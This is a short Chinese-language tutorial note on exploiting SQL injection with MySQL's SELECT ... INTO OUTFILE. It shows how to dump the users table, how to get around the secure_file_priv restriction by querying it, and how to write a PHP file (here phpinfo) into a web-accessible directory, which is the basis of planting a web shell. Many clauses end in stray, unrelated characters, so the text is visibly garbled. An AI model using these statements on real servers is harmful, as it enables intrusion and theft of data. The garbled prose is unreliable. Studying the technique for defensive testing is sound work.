找到注入點后利用語句:select [column...] from [table_name] into outfile [path]導出數(shù)據(jù)信息置森。此信息可以被sql注入利用麸祷。
找出對象服務器系統(tǒng)兔毙,找出apache的根目錄比搭,利用上面語句礼烈,將一個文件放到根目錄中疟位,隨后可以在頁面中訪問該文件阴绢。文件名后綴可以自定義。
有時候導入導出權限會被mysql限制匀们,只能將文件導入或導出到指定位置:
ERROR 1290: The MySQL server is running with the __secure-file-priv option so it cannot execute this statement
這時可以使用語句:show variables like 'secure_file_priv'來查詢能導入導出的位置
找到位置后就在對應位置導入或者導出文件:
select * from users into outfile '/var/lib/mysql-files/aa'
這時我們可以導出一個php文件缴淋,比如
select '<?php phpinfo() ?>' into outfile '/var/lib/mysql-files/test.php';phpinfo是導出php服務器環(huán)境的配置信息
然后准给,我們再去/var/lib/mysql-files目錄下查看是否真的導出成功了泄朴。
